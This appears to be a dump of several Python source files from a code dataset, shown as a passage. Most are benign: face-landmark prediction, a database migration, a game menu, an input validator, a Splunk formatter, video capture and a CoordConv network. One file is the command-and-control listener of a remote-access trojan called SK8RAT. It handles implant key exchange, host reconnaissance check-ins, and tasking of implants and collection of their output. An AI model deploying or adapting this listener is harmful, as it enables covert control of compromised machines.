self.predict_face_box(image) if self.detect_face else (0, 0, w, h)\n if box is None:\n # It would be nice to send error messages to a client\n script = \"nuke.error('No faces found')\\n\"\n script_msg = message_pb2.FieldValuePairAttrib()\n script_msg.name = \"PythonScript\"\n script_msg_val = script_msg.values.add()\n script_msg_str = script_msg_val.string_attributes.add()\n script_msg_str.values.extend([script])\n return [script_msg]\n\n # Draw rectangle around detected face\n (x, y, r, b) = box\n cv2.rectangle(image, (x, y), (r, b), (0, 255, 0), 2)\n\n # Predict points of the detected face\n positions = self.predict_face_points(image, box)\n\n # Create protobuf object\n geo = message_pb2.FieldValuePairAttrib()\n geo.name = \"Geo\"\n geo_val = geo.values.add()\n\n points = geo_val.float_attributes.add()\n points.name = \"points\"\n points.values.extend(positions)\n\n attrs_map = {\n \"indices\": [\"int_attributes\", self.faces],\n \"uv Group_Vertices\": [\"float_attributes\", self.uvs],\n \"N Group_Vertices\": [\"float_attributes\", self.normals],\n }\n\n for k, v in attrs_map.items():\n attr = getattr(geo_val, v[0]).add()\n attr.name = k\n attr.values.extend(v[1])\n\n # Convert image for nuke and with geometry so the model can\n # work both the image processing and 3d nodes\n image = image.astype(np.float32) / 255.\n image = self.srgb_to_linear(image)\n return [image, geo]\n\n def predict_face_box(self, image):\n self.vprint(\"Predicting face bounding box...\")\n\n h, w = image.shape[:2]\n # Create an input tensor for face detection\n blob = cv2.dnn.blobFromImage(\n cv2.resize(image, (300, 300)), 1.0, (300, 300), (104, 177, 123))\n self.detector.setInput(blob)\n\n # Run network\n detections = self.detector.forward()\n\n # Get first plausible detection\n for i in range(0, detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n if (confidence < 0.9):\n continue\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n box = box.astype(\"int\")\n\n self.vprint(\"Found face baounding box {}, {}, {}, {}\".format(*box))\n return box.astype(\"int\")\n\n self.vprint(\"No faces found\")\n\n def transform_points(self, points, tform, image_height):\n # Extract z and apply inverse trasformation\n points = np.reshape(points, [-1, 3]).T\n z = points[2, :].copy() / tform.params[0, 0]\n # invert and offset z in order for points to correspond Nuke's space\n # and were in front of the XY plane\n z *= -1\n min_z = z.min()\n z -= min_z\n # Apply the inverse trasformation for x and y so the points in 3d space\n # would correspond to the points on the image\n points[2, :] = 1\n points = np.dot(np.linalg.inv(tform.params), points)\n # Invert y\n points[1, :] = image_height - points[1, :]\n points = np.vstack((points[:2, :], z))\n return points.T.flatten()\n\n def predict_face_points(self, image, box):\n self.vprint(\"Predicting face points...\")\n\n (x, y, r, b) = box\n w = r - x\n h = b - y\n\n # Define 3 points of the detected rectangle for simiarity transformation\n center = np.array([r - w / 2.0, b - h / 2.0])\n size = int(((w + h) / 2) * 1.6)\n src_points = np.array([\n [center[0] - size / 2, center[1] - size / 2],\n [center[0] - size / 2, center[1] + size / 2],\n [center[0] + size / 2, center[1] - size / 2]\n ])\n\n # Get a similarity transform\n tform = estimate_transform('similarity', src_points, self.dst_points)\n\n # Create an input tensor for point prediction\n input_image = warp(\n image, tform.inverse, output_shape=self.input_shape[1:3])\n input_image = np.asarray(input_image).astype(np.float32)\n input_image = np.reshape(input_image, self.input_shape)\n\n # Run network\n self.interpreter.set_tensor(self.input_index, input_image)\n self.interpreter.invoke()\n output_data = self.interpreter.get_tensor(self.output_index)\n return self.transform_points(\n output_data.flatten(), tform, image.shape[0])\n","sub_path":"Models/arcore/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"121978361","text":"\"\"\"empty message\n\nRevision ID: 13d7f12cd6a4\nRevises: 31c51173d183\nCreate Date: 2014-11-09 01:41:01.448337\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '13d7f12cd6a4'\ndown_revision = '31c51173d183'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('authCode', sa.Integer(), nullable=True))\n op.add_column('user', sa.Column('isAuth', sa.Boolean(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'isAuth')\n op.drop_column('user', 'authCode')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/13d7f12cd6a4_.py","file_name":"13d7f12cd6a4_.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"490973297","text":"#region(zmienić/poprawić:)\n# self.__actual_value = min_value + 2 - aby wskazywało środek między min a max/ nie koniecznie jest to istotne/\n# BUG poprawić kursor aby po wybraniu ilość w min_max_item_menu nie przechodził do ostatniej opcji\n#endregion\nimport os\nimport keyboard\nimport time\nfrom options.options_class import Options\nfrom options.map_class import Map\nfrom options.ship_class import Ship\nfrom options.turn_limit_class import Turn\n\nclass Menu:\n def __init__(self, list_menu, logo):\n self.__menu_list = list_menu\n self.__menu_logo = logo\n \n##############################################################################################\n#region(metody do rysowania pozycji menu, logo, kursor)\n def __draw_arrow(self, arrow_counter_in_menu, arrow_indication,menu_option_edit):\n if menu_option_edit:\n print() \n else:\n if arrow_counter_in_menu == arrow_indication:\n print(\"<-\")\n else:\n print()\n \n def __draw_simple_menu(self, item):\n print(\"{}\".format(item.item_name), end =\" \")\n def __draw_min_max_menu(self, item, menu_min_max_edit):\n if menu_min_max_edit:\n print(\"{} : < {} >\".format(item.item_name, item.actual_value), end =\" \")\n else:\n print(\"{} : {}\".format(item.item_name, item.actual_value), end =\" \")\n #region(__draw_logo(self)\n def __draw_logo(self):\n path = r'c:\\BattleShip\\ascii_alphabet.txt'\n ascii_logo_to_draw = []\n alpha_ascii_list = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','r','s','t','u','w','v','x','y','z',' ','!']\n try:\n with open(path, 'r', encoding=\"UTF-8\") as file:\n content = file.readlines() \n except FileExistsError:\n print(\"Plik nie istnieje\")\n for i in range(len(content)):\n content[i] = content[i].strip()\n for char_in_logo in self.__menu_logo:\n tmp = 0\n for char in alpha_ascii_list:\n if char == char_in_logo:\n break \n tmp += 1 \n i = 0\n if ascii_logo_to_draw == []:\n for i in range(7):\n ascii_logo_to_draw.append(content[i + (tmp * 7)])\n i += 1\n else:\n for i in range(7):\n ascii_logo_to_draw[i] += content[i + (tmp * 7)]\n i += 1\n for item in ascii_logo_to_draw:\n print(item)\n #endregion\n#endregion\n##############################################################################################\n#region(sterowanie menu, wybór min-max item)\n def __validation_indication_in_menu(self, arrow_indication, size_max, size_min = 0 ):\n if arrow_indication < size_min:\n return size_max \n elif arrow_indication > size_max:\n return size_min\n else:\n return arrow_indication\n\n def __menu_user_control(self, arrow_indication, size_max, size_min = 0):\n input_key = True\n while input_key:\n if keyboard.is_pressed('down'):\n arrow_indication += 1\n input_key = False \n return self.__validation_indication_in_menu(arrow_indication, size_max, size_min)\n if keyboard.is_pressed('up'):\n arrow_indication -= 1\n input_key = False \n return self.__validation_indication_in_menu(arrow_indication, size_max, size_min)\n if keyboard.is_pressed('left'):\n arrow_indication = 100\n input_key = False \n return arrow_indication\n if keyboard.is_pressed('right'):\n arrow_indication = -100\n input_key = False \n return arrow_indication\n \n def __menu_min_max_user_control(self, actual_value, size_max, size_min):\n input_key = True\n while input_key:\n if keyboard.is_pressed('down'):\n actual_value -= 1\n input_key = False \n if actual_value < size_min:\n return 0\n else:\n return -1\n if keyboard.is_pressed('up'):\n actual_value += 1\n input_key = False \n if actual_value > size_max:\n return 0\n else:\n return 1\n if keyboard.is_pressed('right'):\n actual_value = -100\n input_key = False \n return actual_value \n#endregion\n##############################################################################################\n#region(główna metoda klasy use_menu)\n def use_menu(self):\n arrow_indication = 0 #domyślna pozycja kursora\n tmp_arrow_indication = 0\n size_menu = len(self.__menu_list) - 1\n run_menu = True\n menu_return_value = None\n menu_min_max_edit = False\n menu_min_max_object = None\n\n while run_menu:\n os.system(\"cls || clear\")\n self.__draw_logo()\n\n arrow_counter_in_menu = 0\n for item in self.__menu_list: \n if isinstance(item, simple_item_menu):\n self.__draw_simple_menu(item)\n self.__draw_arrow(arrow_counter_in_menu, arrow_indication,menu_min_max_edit) \n elif isinstance(item, min_max_item_menu):\n \n if arrow_counter_in_menu == arrow_indication and menu_min_max_edit:\n self.__draw_min_max_menu(item, True)\n else:\n self.__draw_min_max_menu(item, False)\n self.__draw_arrow(arrow_counter_in_menu, arrow_indication,menu_min_max_edit)\n arrow_counter_in_menu += 1\n\n if menu_min_max_edit:\n tmp_arrow_indication = self.__menu_min_max_user_control(menu_min_max_object.actual_value, menu_min_max_object.max_value, menu_min_max_object.min_value) \n else: \n tmp_arrow_indication = self.__menu_user_control(arrow_indication,size_menu) \n \n if tmp_arrow_indication >= 100 and not menu_min_max_edit: \n item = self.__menu_list[arrow_indication]\n\n if isinstance(item, simple_item_menu): \n menu_return_value = item.item_value\n run_menu = False\n elif isinstance(item, min_max_item_menu): \n menu_min_max_edit = True\n menu_min_max_object = item\n tmp_arrow_indication = 0\n\n if tmp_arrow_indication <= -100:\n menu_min_max_edit = False\n\n if menu_min_max_edit:\n menu_min_max_object.actual_value += tmp_arrow_indication \n else:\n arrow_indication = self.__validation_indication_in_menu(tmp_arrow_indication, size_menu)\n \n time.sleep(0.21) \n \n return menu_return_value\n#endregion \n##############################################################################################\n#region(klasy/rodzaje menu)\nclass simple_item_menu:\n def __init__(self, item_menu_name, menu_return_value):\n self.__item_menu_name = item_menu_name\n self.__item_menu_value = menu_return_value\n @property\n def item_name(self):\n return self.__item_menu_name\n @property\n def item_value(self):\n return self.__item_menu_value\n\nclass min_max_item_menu:\n #menu_return_value\n def __init__(self, item_menu_name, min_value, max_value, option_object):\n self.__item_menu_name = item_menu_name \n self.__min_value = min_value\n self.__max_value = max_value\n self.__option_object = option_object\n @property\n def min_value(self):\n return self.__min_value\n @property\n def max_value(self):\n return self.__max_value\n @property\n def item_name(self):\n return self.__item_menu_name\n \n @property\n def actual_value(self):\n if isinstance(self.__option_object, Map):\n return self.__option_object.map_size \n if isinstance(self.__option_object, Ship):\n return self.__option_object.fleet_size \n if isinstance(self.__option_object, Turn):\n return self.__option_object.turn_limit\n\n @actual_value.setter\n def actual_value(self, value):\n if isinstance(self.__option_object, Map):\n self.__option_object.map_size = value\n if isinstance(self.__option_object, Ship):\n self.__option_object.fleet_size = value\n if isinstance(self.__option_object, Turn):\n self.__option_object.turn_limit = value\n#endregion\n##############################################################################################\n\n\n","sub_path":"menu_class.py","file_name":"menu_class.py","file_ext":"py","file_size_in_byte":9154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"68935571","text":"#!/usr/bin/python\nfrom sys import stdin\nimport re\nimport sys\n\ninteger = \"(0|-?[1-9]\\d*)\"\noneint = re.compile(integer + \"\\n\")\nmanyint = re.compile(\"({0} )*{0}\\n\".format(integer))\n\nline = stdin.readline()\nassert oneint.match(line)\nn = int(line)\nassert 1 <= n <= 10 ** 5\n\nline = stdin.readline()\nassert manyint.match(line)\na = list(map(int, line.split()))\nassert len(a) == n\nfor x in a:\n assert 1 <= x <= 10 ** 6\n\nassert len(stdin.readline()) == 0\nsys.exit(42)\n","sub_path":"ncpc2013/trees/input_format_validators/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"260475913","text":"import logging\r\nimport traceback\r\n\r\n\r\nclass SplunkFormatter(logging.Formatter):\r\n \"\"\"\r\n Class to create Splunk-compatible logs\r\n \"\"\"\r\n def __init__(self, logging_app, project, reporter, fmt=None, datefmt=None, style='%', **extras):\r\n \"\"\"\r\n\r\n :param logging_app: logger=\r\n :param project: project=\r\n :param reporter: reporter=\r\n :param fmt:\r\n :param datefmt:\r\n :param style:\r\n :param extras: any additional data to be added to Splunk event\r\n \"\"\"\r\n self.project = project\r\n self.reporter = reporter\r\n self.logging_app = logging_app\r\n self.extras = extras\r\n super(SplunkFormatter, self).__init__(fmt=fmt, datefmt=datefmt, style=style)\r\n\r\n def format(self, record):\r\n\r\n def jsn(item: str) -> str:\r\n return str(item).replace('\"', '\\\"')\r\n\r\n event = dict({'logger': self.logging_app,\r\n 'level': record.levelname,\r\n 'reporter': self.reporter,\r\n 'project': self.project,\r\n 'module': record.module,\r\n 'action': record.funcName,\r\n 'result': jsn(record.msg)})\r\n if self.extras:\r\n extras = {k: jsn(v) for (k, v) in self.extras.items()}\r\n event.update(extras)\r\n if record.exc_info:\r\n event.update({'traceback': ''.join(traceback.format_exception(*record.exc_info))})\r\n return event","sub_path":"tm4j_adapter/classes/SplunkFormatter.py","file_name":"SplunkFormatter.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"605085228","text":"from flask_restful import Resource\nfrom flask import request\nfrom models_listener import (ListenerModel, TaskModel, SK8RATModel)\nfrom nacl.public import SealedBox\nimport nacl.secret\nimport nacl.utils\nimport base64\nimport random\nimport string\nimport json\n\n\n# /stage0\nclass NegotiateSessionKey(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n guid = post_data[0]\n nonce = base64.b64decode(post_data[1])\n ciphertext = base64.b64decode(post_data[2])\n\n # Grab shared key from listener\n Listener = ListenerModel.query.filter(ListenerModel.listener_type == \"http\").first()\n sharedkey = base64.b64decode(Listener.shared_key)\n\n # Decode ciphertext (client_publickey) using pynacl\n box = nacl.secret.SecretBox(sharedkey)\n client_publickey = box.decrypt(ciphertext, nonce)\n\n # Generate final session key\n session_key = nacl.utils.random(nacl.secret.SecretBox.KEY_SIZE)\n\n # Write SK8RAT to database with agent name + b64(sessionkey)\n new_SK8RAT = SK8RATModel(\n name=''.join(random.choices(string.ascii_uppercase + string.digits, k=15)),\n guid=guid,\n session_key=base64.b64encode(session_key).decode(\"UTF-8\"),\n session_cookie=''.join(random.choices(string.ascii_uppercase + string.digits, k=15)),\n external_ip=request.remote_addr\n )\n new_SK8RAT.save_to_db()\n\n # Use sealed box with (client_publickey) to send session key to SK8RAT\n publickey = nacl.public.PublicKey(client_publickey)\n sealed_box = SealedBox(publickey)\n encrypted = sealed_box.encrypt(session_key)\n\n return base64.b64encode(encrypted).decode(\"UTF-8\")\n\n\n# /stage1\nclass ChallengeResponseOne(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n guid = post_data[0]\n nonce = base64.b64decode(post_data[1])\n ciphertext = base64.b64decode(post_data[2])\n\n # Obtain sessionkey from database\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.guid == guid).first()\n session_key = base64.b64decode(SK8RAT.session_key)\n\n # Decode ciphertext using pynacl\n box = nacl.secret.SecretBox(session_key)\n client_challenge = box.decrypt(ciphertext, nonce)\n\n # Stuff client and server challenge into db\n server_challenge = nacl.utils.random(4)\n SK8RAT.client_challenge = base64.b64encode(client_challenge).decode(\"UTF-8\")\n SK8RAT.server_challenge = base64.b64encode(server_challenge).decode(\"UTF-8\")\n SK8RAT.save_to_db()\n\n # Prepare server response K[client_challenge + server_challenge]\n message = client_challenge + server_challenge\n box = nacl.secret.SecretBox(session_key)\n nonce = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)\n encrypted = box.encrypt(message, nonce)\n ciphertext = encrypted.ciphertext\n ciphertext_b64 = base64.b64encode(ciphertext).decode(\"UTF-8\")\n nonce_b64 = base64.b64encode(nonce).decode(\"UTF-8\")\n server_response = nonce_b64 + \":\" + ciphertext_b64\n\n return server_response\n\n\n# /stage2\nclass ChallengeResponseTwo(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n guid = post_data[0]\n nonce = base64.b64decode(post_data[1])\n ciphertext = base64.b64decode(post_data[2])\n\n # Obtain sessionkey from database\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.guid == guid).first()\n session_key = base64.b64decode(SK8RAT.session_key)\n\n # Obtain server_challenge from database\n server_challenge = base64.b64decode(SK8RAT.server_challenge)\n\n # Decode ciphertext using pynacl\n box = nacl.secret.SecretBox(session_key)\n server_challenge_returned = box.decrypt(ciphertext, nonce)\n\n # return K[session_cookie] if challenge matches, else return 0\n if (server_challenge == server_challenge_returned):\n message = (SK8RAT.session_cookie).encode(\"UTF-8\")\n box = nacl.secret.SecretBox(session_key)\n nonce_server = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)\n encrypted = box.encrypt(message, nonce_server)\n ciphertext = encrypted.ciphertext\n ciphertext_b64 = base64.b64encode(ciphertext).decode(\"UTF-8\")\n nonce_b64 = base64.b64encode(nonce_server).decode(\"UTF-8\")\n server_response = nonce_b64 + \":\" + ciphertext_b64\n return server_response\n else:\n return {'message': 'Potential MITM!'}\n\n\n# /stage3\nclass FirstCheckIn(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n nonce = base64.b64decode(post_data[0])\n ciphertext = base64.b64decode(post_data[1])\n\n # Read session cookie and grab corresponding session key, if cookie is invalid throw error\n session_cookie = request.cookies.get('macaroon')\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.session_cookie == session_cookie).first()\n if (SK8RAT):\n session_key = base64.b64decode(SK8RAT.session_key)\n else:\n return {'message': 'Bad cookie.'}\n\n # Decode ciphertext using pynacl, store as json object\n box = nacl.secret.SecretBox(session_key)\n json_string = box.decrypt(ciphertext, nonce)\n json_blob = json.loads(json_string)\n\n # Parse json object and update database\n SK8RAT.username = json_blob['username']\n SK8RAT.hostname = json_blob['hostname']\n SK8RAT.pid = json_blob['pid']\n SK8RAT.internal_ip = json_blob['internal_ip']\n SK8RAT.admin = json_blob['admin']\n SK8RAT.os = json_blob['os']\n SK8RAT.listener_id = json_blob['listener_id']\n SK8RAT.server_ip = json_blob['server_ip']\n SK8RAT.sleep = json_blob['sleep']\n SK8RAT.jitter = json_blob['jitter']\n SK8RAT.last_seen = json_blob['last_seen']\n SK8RAT.save_to_db()\n\n return 1\n\n\n# /get\nclass SK8RATGet(Resource):\n def get(self):\n # Read session cookie and grab corresponding session key, if cookie is invalid throw error\n session_cookie = request.cookies.get('macaroon')\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.session_cookie == session_cookie).first()\n if (SK8RAT):\n session_key = base64.b64decode(SK8RAT.session_key)\n else:\n return {'message': 'Bad cookie.'}\n\n task = TaskModel.query.filter(TaskModel.guid == SK8RAT.guid).filter(TaskModel.task_status == \"wait\").all() \n\n # Assemble task_id, task, task_status, task_output\n task_id_list = []\n task_list = []\n task_status_list = []\n task_output_list = []\n for x in task:\n task_id_list.append(x.task_id)\n task_list.append(x.task)\n task_status_list.append(x.task_status)\n task_output_list.append(x.task_output)\n\n # Assemble complete message\n # \n # guid\n # last_seen\n # sleep\n # jitter\n # task_id\n # task\n # task_status\n # task_output\n data = {}\n data['guid'] = SK8RAT.guid\n data['last_seen'] = SK8RAT.last_seen\n data['sleep'] = SK8RAT.sleep\n data['jitter'] = SK8RAT.jitter\n data['task_id'] = task_id_list\n data['task'] = task_list\n data['task_status'] = task_status_list\n data['task_output'] = task_output_list\n\n # Server response assembled\n json_data = json.dumps(data)\n\n # Encrypt server response\n message = json_data\n box = nacl.secret.SecretBox(session_key)\n nonce = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)\n encrypted = box.encrypt(message.encode(\"UTF=8\"), nonce)\n ciphertext = encrypted.ciphertext\n ciphertext_b64 = base64.b64encode(ciphertext).decode(\"UTF-8\")\n nonce_b64 = base64.b64encode(nonce).decode(\"UTF-8\")\n server_response = nonce_b64 + \":\" + ciphertext_b64\n\n return server_response\n\n\n# /post\nclass SK8RATPost(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n nonce = base64.b64decode(post_data[0])\n ciphertext = base64.b64decode(post_data[1])\n\n # Read session cookie and grab corresponding session key, if cookie is invalid throw error\n session_cookie = request.cookies.get('macaroon')\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.session_cookie == session_cookie).first()\n if (SK8RAT):\n session_key = base64.b64decode(SK8RAT.session_key)\n else:\n return {'message': 'Bad cookie.'}\n\n # Decode ciphertext using pynacl, store as json object\n box = nacl.secret.SecretBox(session_key)\n json_string = box.decrypt(ciphertext, nonce)\n json_blob = json.loads(json_string)\n\n # \n # guid\n # last_seen\n # sleep\n # jitter\n # task_id\n # task\n # task_status\n # task_output\n\n # Update last_seen in database\n SK8RAT.last_seen = json_blob['last_seen']\n SK8RAT.save_to_db()\n\n # Loop through and match task_id and guid to retrieve correct TaskModel\n counter = 0\n for x in json_blob['task_id']:\n Task = TaskModel.query.filter(TaskModel.guid == SK8RAT.guid).filter(TaskModel.task_id == x).first()\n Task.task_status = json_blob['task_status'][counter]\n Task.task_output = json_blob['task_output'][counter]\n Task.save_to_db()\n counter = counter + 1\n","sub_path":"resources_listener.py","file_name":"resources_listener.py","file_ext":"py","file_size_in_byte":10140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"168897312","text":"import cv2\nimport time\nfrom timeit import default_timer as timer\n\nclass Video:\n def __init__(self, videoDir):\n \"\"\"\n\n :param videoDir:\n \"\"\"\n self.cap = cv2.VideoCapture(videoDir) # 获取视频对象\n self.isOpened = self.cap.isOpened # 判断是否打开\n self.fps = self.cap.get(cv2.CAP_PROP_FPS)\n self.width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n self.height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n self.nFrame = 0\n self.time = timer()\n\n def getImageFromVideo(self):\n \"\"\"\n\n :return:\n frame\n \"\"\"\n if self.isOpened:\n (frameState, frame) = self.cap.read() # 记录每帧及获取状态\n if frameState == True:\n t = time.time() # 获取当前帧的时间\n self.nFrame += 1\n nF = self.nFrame\n return frame, nF, t\n else:\n return None, None, None\n else:\n return None, None, None\n\n\nif __name__ == '__main__':\n avi = Video(\"E:\\\\1\\\\1.avi\")\n frame = avi.getImageFromVideo()\n while frame is not None:\n frame = avi.getImageFromVideo()\n \"\"\"\n Then write your frame process code here.\n \"\"\"\n if frame is not None:\n cv2.imshow(\"avi\", frame)\n cv2.waitKey(10)\n\n\"\"\" \ndef getImageFromVideo(VideoDir):\n cap = cv2.VideoCapture(VideoDir) # 获取视频对象\n isOpened = cap.isOpened # 判断是否打开\n # 视频信息获取\n fps = cap.get(cv2.CAP_PROP_FPS)\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n imageNum = 0\n while (isOpened):\n if imageNum / fps == 2: # 获取两秒内视频图片\n break\n else:\n imageNum = imageNum + 1\n (frameState, frame) = cap.read() # 记录每帧及获取状态\n fileName = 'image' + str(imageNum) + '.jpg' # 存储路径\n\n if frameState == True:\n cv2.imwrite(fileName, frame, [cv2.IMWRITE_JPEG_QUALITY, 100])\n print(fileName + \"successfully write in\") # 输出存储状态\n print('finish!')\n\"\"\"\n\n\n","sub_path":"src/Vision/新建文件夹/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"212962384","text":"import torch\nimport torch.nn as nn\nimport torch.nn.modules.conv as conv\nfrom torch import Tensor\nfrom typing import Type, Any, Callable, Union, List, Optional\n\nclass AddCoords(nn.Module):\n def __init__(self, rank, with_r=False, use_cuda=False):\n super(AddCoords, self).__init__()\n self.rank = rank\n self.with_r = with_r\n self.use_cuda = use_cuda\n\n def forward(self, input_tensor):\n \"\"\"\n :param input_tensor: shape (N, C_in, H, W)\n :return:\n \"\"\"\n if self.rank == 1:\n batch_size_shape, channel_in_shape, dim_x = input_tensor.shape\n xx_range = torch.arange(dim_x, dtype=torch.int32)\n xx_channel = xx_range[None, None, :]\n\n xx_channel = xx_channel.float() / (dim_x - 1)\n xx_channel = xx_channel * 2 - 1\n xx_channel = xx_channel.repeat(batch_size_shape, 1, 1)\n\n if torch.cuda.is_available and self.use_cuda:\n input_tensor = input_tensor.cuda()\n xx_channel = xx_channel.cuda()\n out = torch.cat([input_tensor, xx_channel], dim=1)\n\n if self.with_r:\n rr = torch.sqrt(torch.pow(xx_channel - 0.5, 2))\n out = torch.cat([out, rr], dim=1)\n\n elif self.rank == 2:\n batch_size_shape, channel_in_shape, dim_y, dim_x = input_tensor.shape\n xx_ones = torch.ones([1, 1, 1, dim_x], dtype=torch.int32)\n yy_ones = torch.ones([1, 1, 1, dim_y], dtype=torch.int32)\n\n xx_range = torch.arange(dim_y, dtype=torch.int32)\n yy_range = torch.arange(dim_x, dtype=torch.int32)\n xx_range = xx_range[None, None, :, None]\n yy_range = yy_range[None, None, :, None]\n\n xx_channel = torch.matmul(xx_range, xx_ones)\n yy_channel = torch.matmul(yy_range, yy_ones)\n\n # transpose y\n yy_channel = yy_channel.permute(0, 1, 3, 2)\n\n xx_channel = xx_channel.float() / (dim_y - 1)\n yy_channel = yy_channel.float() / (dim_x - 1)\n\n xx_channel = xx_channel * 2 - 1\n yy_channel = yy_channel * 2 - 1\n\n xx_channel = xx_channel.repeat(batch_size_shape, 1, 1, 1)\n yy_channel = yy_channel.repeat(batch_size_shape, 1, 1, 1)\n\n if torch.cuda.is_available and self.use_cuda:\n input_tensor = input_tensor.cuda()\n xx_channel = xx_channel.cuda()\n yy_channel = yy_channel.cuda()\n out = torch.cat([input_tensor, xx_channel, yy_channel], dim=1)\n\n if self.with_r:\n rr = torch.sqrt(torch.pow(xx_channel - 0.5, 2) + torch.pow(yy_channel - 0.5, 2))\n out = torch.cat([out, rr], dim=1)\n\n elif self.rank == 3:\n batch_size_shape, channel_in_shape, dim_z, dim_y, dim_x = input_tensor.shape\n xx_ones = torch.ones([1, 1, 1, 1, dim_x], dtype=torch.int32)\n yy_ones = torch.ones([1, 1, 1, 1, dim_y], dtype=torch.int32)\n zz_ones = torch.ones([1, 1, 1, 1, dim_z], dtype=torch.int32)\n\n xy_range = torch.arange(dim_y, dtype=torch.int32)\n xy_range = xy_range[None, None, None, :, None]\n\n yz_range = torch.arange(dim_z, dtype=torch.int32)\n yz_range = yz_range[None, None, None, :, None]\n\n zx_range = torch.arange(dim_x, dtype=torch.int32)\n zx_range = zx_range[None, None, None, :, None]\n\n xy_channel = torch.matmul(xy_range, xx_ones)\n xx_channel = torch.cat([xy_channel + i for i in range(dim_z)], dim=2)\n\n yz_channel = torch.matmul(yz_range, yy_ones)\n yz_channel = yz_channel.permute(0, 1, 3, 4, 2)\n yy_channel = torch.cat([yz_channel + i for i in range(dim_x)], dim=4)\n\n zx_channel = torch.matmul(zx_range, zz_ones)\n zx_channel = zx_channel.permute(0, 1, 4, 2, 3)\n zz_channel = torch.cat([zx_channel + i for i in range(dim_y)], dim=3)\n\n if torch.cuda.is_available and self.use_cuda:\n input_tensor = input_tensor.cuda()\n xx_channel = xx_channel.cuda()\n yy_channel = yy_channel.cuda()\n zz_channel = zz_channel.cuda()\n out = torch.cat([input_tensor, xx_channel, yy_channel, zz_channel], dim=1)\n\n if self.with_r:\n rr = torch.sqrt(torch.pow(xx_channel - 0.5, 2) +\n torch.pow(yy_channel - 0.5, 2) +\n torch.pow(zz_channel - 0.5, 2))\n out = torch.cat([out, rr], dim=1)\n else:\n raise NotImplementedError\n\n return out\n\nclass CoordConv1d(conv.Conv1d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=1, dilation=1, groups=1, bias=True, with_r=False, use_cuda=False):\n super(CoordConv1d, self).__init__(in_channels, out_channels, kernel_size,\n stride, padding, dilation, groups, bias)\n self.rank = 1\n self.addcoords = AddCoords(self.rank, with_r, use_cuda=use_cuda)\n self.conv = nn.Conv1d(in_channels + self.rank + int(with_r), out_channels,\n kernel_size, stride, padding, dilation, groups, bias)\n\n def forward(self, input_tensor):\n \"\"\"\n input_tensor_shape: (N, C_in,H,W)\n output_tensor_shape: N,C_out,H_out,W_out)\n :return: CoordConv2d Result\n \"\"\"\n out = self.addcoords(input_tensor)\n out = self.conv(out)\n\n return out\n\nchannel_size = 12\n\ndef conv3x3(in_planes: int, out_planes: int, stride: int = 1, groups: int = 1, dilation: int = 1) -> nn.Conv1d:\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv1d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=dilation, groups=groups, bias=False, dilation=dilation)\n\n\ndef conv1x1(in_planes: int, out_planes: int, stride: int = 1) -> nn.Conv1d:\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv1d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion: int = 1\n\n def __init__(\n self,\n inplanes: int,\n planes: int,\n stride: int = 1,\n downsample: Optional[nn.Module] = None,\n groups: int = 1,\n base_width: int = 64,\n dilation: int = 1,\n norm_layer: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(BasicBlock, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm1d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock only supports groups=1 and base_width=64')\n if dilation > 1:\n raise NotImplementedError(\"Dilation > 1 not supported in BasicBlock\")\n # Both 